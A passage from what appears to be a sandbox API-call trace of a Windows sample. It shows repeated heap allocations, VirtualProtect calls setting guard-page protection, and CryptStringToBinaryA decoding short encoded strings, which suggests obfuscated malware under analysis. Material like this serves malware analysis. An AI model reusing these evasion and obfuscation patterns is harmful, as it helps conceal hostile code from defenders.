lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c3140 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1878 [0181.158] VirtualProtect (in: lpAddress=0x5c1878, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc850 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1990 [0181.158] VirtualProtect (in: lpAddress=0x5c1990, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c30e0 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2138 [0181.158] VirtualProtect (in: lpAddress=0x5c2138, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c3098 [0181.158] GetProcessHeap () returned 0x5b0000 [0181.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2250 [0181.159] VirtualProtect (in: lpAddress=0x5c2250, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.159] GetProcessHeap () returned 0x5b0000 [0181.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5c3080 [0181.159] GetProcessHeap () returned 0x5b0000 [0181.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c1bc0 [0181.159] VirtualProtect (in: lpAddress=0x5c1bc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.159] GetProcessHeap () returned 0x5b0000 [0181.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c3038 [0181.159] GetProcessHeap () returned 0x5b0000 [0181.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2368 [0181.159] VirtualProtect (in: lpAddress=0x5c2368, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.159] GetProcessHeap () returned 0x5b0000 [0181.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c3128 [0181.159] GetProcessHeap () returned 0x5b0000 [0181.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c11e8 [0181.160] VirtualProtect (in: lpAddress=0x5c11e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc7b0 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2480 [0181.160] VirtualProtect (in: lpAddress=0x5c2480, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5bc510 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c29f8 [0181.160] VirtualProtect (in: lpAddress=0x5c29f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c3278 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c2598 [0181.160] VirtualProtect (in: lpAddress=0x5c2598, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5c30b0 [0181.160] GetProcessHeap () returned 0x5b0000 [0181.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4ae8 [0181.161] VirtualProtect (in: lpAddress=0x5c4ae8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.161] GetProcessHeap () returned 0x5b0000 [0181.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc770 [0181.161] GetProcessHeap () returned 0x5b0000 [0181.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c5178 [0181.161] VirtualProtect (in: lpAddress=0x5c5178, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1b) returned 0x5c53d0 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4c00 [0181.162] VirtualProtect (in: lpAddress=0x5c4c00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5c3290 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4d18 [0181.162] VirtualProtect (in: lpAddress=0x5c4d18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5c3170 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3738 [0181.162] VirtualProtect (in: lpAddress=0x5c3738, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5bc890 [0181.162] GetProcessHeap () returned 0x5b0000 [0181.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3b98 [0181.162] VirtualProtect (in: lpAddress=0x5c3b98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc5f0 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4570 [0181.163] VirtualProtect (in: lpAddress=0x5c4570, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x16) returned 0x5bc8b0 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3620 [0181.163] VirtualProtect (in: lpAddress=0x5c3620, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c3050 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4340 [0181.163] VirtualProtect (in: lpAddress=0x5c4340, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5bc630 [0181.163] GetProcessHeap () returned 0x5b0000 [0181.164] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3850 [0181.164] VirtualProtect (in: lpAddress=0x5c3850, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.164] GetProcessHeap () returned 0x5b0000 [0181.164] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c3068 [0181.205] GetProcessHeap () returned 0x5b0000 [0181.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4e30 [0181.205] VirtualProtect (in: lpAddress=0x5c4e30, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.205] GetProcessHeap () returned 0x5b0000 [0181.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5bc650 [0181.206] GetProcessHeap () returned 0x5b0000 [0181.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4f48 [0181.206] VirtualProtect (in: lpAddress=0x5c4f48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.206] GetProcessHeap () returned 0x5b0000 [0181.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5bc4f0 [0181.206] GetProcessHeap () returned 0x5b0000 [0181.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c5060 [0181.206] VirtualProtect (in: lpAddress=0x5c5060, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.206] GetProcessHeap () returned 0x5b0000 [0181.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c32d8 [0181.207] GetProcessHeap () returned 0x5b0000 [0181.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c33f0 [0181.207] VirtualProtect (in: lpAddress=0x5c33f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.207] GetProcessHeap () returned 0x5b0000 [0181.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5bc590 [0181.207] GetProcessHeap () returned 0x5b0000 [0181.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c47a0 [0181.207] VirtualProtect (in: lpAddress=0x5c47a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.207] GetProcessHeap () returned 0x5b0000 [0181.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5bc6d0 [0181.208] GetProcessHeap () returned 0x5b0000 [0181.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3ff8 [0181.208] VirtualProtect (in: lpAddress=0x5c3ff8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.208] GetProcessHeap () returned 0x5b0000 [0181.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5bc6f0 [0181.208] GetProcessHeap () returned 0x5b0000 [0181.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c5290 [0181.208] VirtualProtect (in: lpAddress=0x5c5290, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.208] GetProcessHeap () returned 0x5b0000 [0181.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5c30c8 [0181.208] GetProcessHeap () returned 0x5b0000 [0181.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3968 [0181.208] VirtualProtect (in: lpAddress=0x5c3968, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.208] GetProcessHeap () returned 0x5b0000 [0181.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5bc710 [0181.209] GetProcessHeap () returned 0x5b0000 [0181.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c48b8 [0181.209] VirtualProtect (in: lpAddress=0x5c48b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.209] GetProcessHeap () returned 0x5b0000 [0181.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5bc730 [0181.209] GetProcessHeap () returned 0x5b0000 [0181.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4458 [0181.209] VirtualProtect (in: lpAddress=0x5c4458, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.209] GetProcessHeap () returned 0x5b0000 [0181.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5c5a08 [0181.210] GetProcessHeap () returned 0x5b0000 [0181.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3a80 [0181.210] VirtualProtect (in: lpAddress=0x5c3a80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.210] GetProcessHeap () returned 0x5b0000 [0181.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5948 [0181.210] GetProcessHeap () returned 0x5b0000 [0181.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4228 [0181.210] VirtualProtect (in: lpAddress=0x5c4228, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.210] GetProcessHeap () returned 0x5b0000 [0181.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c30f8 [0181.210] GetProcessHeap () returned 0x5b0000 [0181.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3ee0 [0181.210] VirtualProtect (in: lpAddress=0x5c3ee0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.210] GetProcessHeap () returned 0x5b0000 [0181.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5c3230 [0181.211] GetProcessHeap () returned 0x5b0000 [0181.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3cb0 [0181.211] VirtualProtect (in: lpAddress=0x5c3cb0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.211] GetProcessHeap () returned 0x5b0000 [0181.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x16) returned 0x5c5b88 [0181.211] GetProcessHeap () returned 0x5b0000 [0181.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3dc8 [0181.211] VirtualProtect (in: lpAddress=0x5c3dc8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.211] GetProcessHeap () returned 0x5b0000 [0181.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5c5908 [0181.212] CryptStringToBinaryA (in: pszString="TBCdR/qUAgpi", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.212] CryptStringToBinaryA (in: pszString="TBCdR/qUAgpi", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.212] GetProcessHeap () returned 0x5b0000 [0181.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4110 [0181.212] VirtualProtect (in: lpAddress=0x5c4110, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.212] GetProcessHeap () returned 0x5b0000 [0181.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c31a0 [0181.212] CryptStringToBinaryA (in: pszString="WRCFZtg=", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.212] CryptStringToBinaryA (in: pszString="WRCFZtg=", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.212] GetProcessHeap () returned 0x5b0000 [0181.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c4688 [0181.212] VirtualProtect (in: lpAddress=0x5c4688, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.212] GetProcessHeap () returned 0x5b0000 [0181.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6) returned 0x5bedd0 [0181.212] CryptStringToBinaryA (in: pszString="WRCFceKUEytMECPib8DPKQ==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.212] CryptStringToBinaryA (in: pszString="WRCFceKUEytMECPib8DPKQ==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.212] GetProcessHeap () returned 0x5b0000 [0181.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c3508 [0181.212] VirtualProtect (in: lpAddress=0x5c3508, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.213] GetProcessHeap () returned 0x5b0000 [0181.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5a28 [0181.213] CryptStringToBinaryA (in: pszString="WRCFZv6UDDpOLRH/c83DLQ==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.213] CryptStringToBinaryA (in: pszString="WRCFZv6UDDpOLRH/c83DLQ==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.213] GetProcessHeap () returned 0x5b0000 [0181.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c49d0 [0181.213] VirtualProtect (in: lpAddress=0x5c49d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.213] GetProcessHeap () returned 0x5b0000 [0181.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5a48 [0181.213] CryptStringToBinaryA (in: pszString="WRCFdfKJAyFWDyP1aQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.213] CryptStringToBinaryA (in: pszString="WRCFdfKJAyFWDyP1aQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.213] GetProcessHeap () returned 0x5b0000 [0181.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c63d0 [0181.214] VirtualProtect (in: lpAddress=0x5c63d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.214] GetProcessHeap () returned 0x5b0000 [0181.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c31b8 [0181.214] CryptStringToBinaryA (in: pszString="WRCFdfKJAyFWGQU=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.214] CryptStringToBinaryA (in: pszString="WRCFdfKJAyFWGQU=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.214] GetProcessHeap () returned 0x5b0000 [0181.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6718 [0181.214] VirtualProtect (in: lpAddress=0x5c6718, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.214] GetProcessHeap () returned 0x5b0000 [0181.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c31d0 [0181.214] CryptStringToBinaryA (in: pszString="XRmeUf6wDiBFMjE=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.214] CryptStringToBinaryA (in: pszString="XRmeUf6wDiBFMjE=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.214] GetProcessHeap () returned 0x5b0000 [0181.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7668 [0181.214] VirtualProtect (in: lpAddress=0x5c7668, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.215] GetProcessHeap () returned 0x5b0000 [0181.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c31e8 [0181.215] CryptStringToBinaryA (in: pszString="TBCWbeuCCQVEJAPuXA==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.215] CryptStringToBinaryA (in: pszString="TBCWbeuCCQVEJAPuXA==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.215] GetProcessHeap () returned 0x5b0000 [0181.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c64e8 [0181.215] VirtualProtect (in: lpAddress=0x5c64e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.215] GetProcessHeap () returned 0x5b0000 [0181.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c2ff0 [0181.215] CryptStringToBinaryA (in: pszString="TBCWc+6CFTd3PCrjeOzUGw==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.215] CryptStringToBinaryA (in: pszString="TBCWc+6CFTd3PCrjeOzUGw==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.215] GetProcessHeap () returned 0x5b0000 [0181.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c5e58 [0181.215] VirtualProtect (in: lpAddress=0x5c5e58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.215] GetProcessHeap () returned 0x5b0000 [0181.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5928 [0181.215] CryptStringToBinaryA (in: pszString="TBCWYfeIFCtqOD8=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.215] CryptStringToBinaryA (in: pszString="TBCWYfeIFCtqOD8=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.216] GetProcessHeap () returned 0x5b0000 [0181.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c62b8 [0181.216] VirtualProtect (in: lpAddress=0x5c62b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.216] GetProcessHeap () returned 0x5b0000 [0181.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c3248 [0181.216] CryptStringToBinaryA (in: 